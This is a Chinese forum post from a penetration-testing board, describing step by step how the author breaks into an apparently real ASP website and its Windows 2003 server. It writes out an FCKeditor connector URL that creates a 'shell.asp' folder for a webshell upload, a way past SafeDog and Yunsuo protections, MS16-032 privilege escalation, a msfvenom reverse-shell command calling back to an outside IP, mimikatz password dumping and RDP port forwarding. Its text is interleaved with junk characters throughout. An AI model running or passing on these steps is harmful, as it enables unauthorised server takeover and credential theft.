找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 从getwebshell到绕过安全狗云锁提权再到利用matasploit ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1933|回复: 1
打印 上一主题 下一主题

从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:31:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

; B' q' s$ }- y7 G! M

x5 J {3 l5 L5 @* y$ f2 p! B, `. Y4 n. I K( q1 v! O4 V5 C' X/ m$ ^( K3 O1 H% O5 S$ N6 Q( M8 |6 J5 F9 _ |# S' P5 U1 p$ z+ }! d
2 S- I& a& H: U) J- Y! T7 [

3 k: o* I; ^2 E: _4 d6 J
% v/ E7 m! E# T2 C! f一、 利用getwebshell
* J& ~$ t9 Z" p
1 j8 j" w9 i O1 A首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
& @5 f% f# z$ g! _, F+ A6 T
a5 {' ~8 @, u* j. l5 i222.png
M) K4 w8 R% v 下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
' `& H# n& m; I 333.png
8 o6 r0 y2 Q' k5 |* o" h4 W下面我们构造一个asp目录,如: * e E0 V, Z0 M& G# ^

! x Z. U' L, @; Z" ~" g

! P, ~0 l1 M+ J http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 ' Q5 ^' o0 k: Y) O. y

/ L" B7 H! V6 @$ ^7 h3 `

* Q: F4 K$ o/ A1 I 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 [9 n8 T7 r* t. i- L \- e6 @. s
! Y3 U0 p( s+ Q/ y9 s8 ]! {一、 绕过安全狗云锁提权并且加账号
, d, V3 z3 ^2 _! o8 @& U% ^ 444.png
! \. U" Z# H I3 `( Z 没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
! M$ O L9 D5 o0 r
) C5 S O b! V7 h/ W+ F如图:
8 c2 u8 `6 C" S5 N' b: i 555.png
+ I; s3 Y) |, J- i/ g1 M然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
" y4 q" a5 Y0 y. L, t! m Q
" w1 V: F% W/ A2 T一、 利用metasploit
% H" z. h, x7 g. W& N$ H2 U
' D+ U6 Z) d# S9 X8 x4 n; ~ 首先用pentestbox生成一个64位的payload如下命令
* D& ]8 e# n ~, t3 w1 S
' `, |. M! L' e1 lmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
& C; c+ }0 `$ p/ K8 |2 S: I
2 @+ q% ?: j& Y! b8 q$ c3 l为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
- e4 ?# @- R4 W, H' H11.png
% O4 s* A. A5 ]: Y# d4 j4 ~下面我们用这个命令抓一下明文密码命令1use mimikatz 命令2kerberos如下图:
# _2 p/ l7 D6 [6 ]- B5 w2 D13.png
& S* r' Y6 L$ W下面我们来做一个监听如下命令:
# W% |% [' L# X! N: |: ^
3 q# V+ M. I {& @1 _$ R portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP6655端口如图:
, x& P: Y w, B) L5 R18.png / L6 `9 \' i8 z3 ~ G/ b

" b8 E6 D5 g, N1 c% k0 `' W
! r0 S% l; [ h9 X J) B

8 u4 M$ m0 g: g+ U4 ~. o# Y

7 E+ `* F: ^; @/ ^- M: s
7 g: d) k% S7 S2 z8 M% F! z, R
& x! U# {0 H3 {) z a 7 ?0 n1 C* k/ o. n* {1 C: I$ v

; A* a1 t' I; `% y& m7 r
: |& l: H& n1 W X% g5 Y# e & P& ?! z$ b# Y/ d. Y5 M1 G

5 B. }4 t# h1 s5 R
% `( [$ z4 A& G9 B8 d

回复

使用道具 举报

沙发
匿名  发表于 2021-11-20 23:30:06
图片怎么都没了
回复 支持 反对

使用道具

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表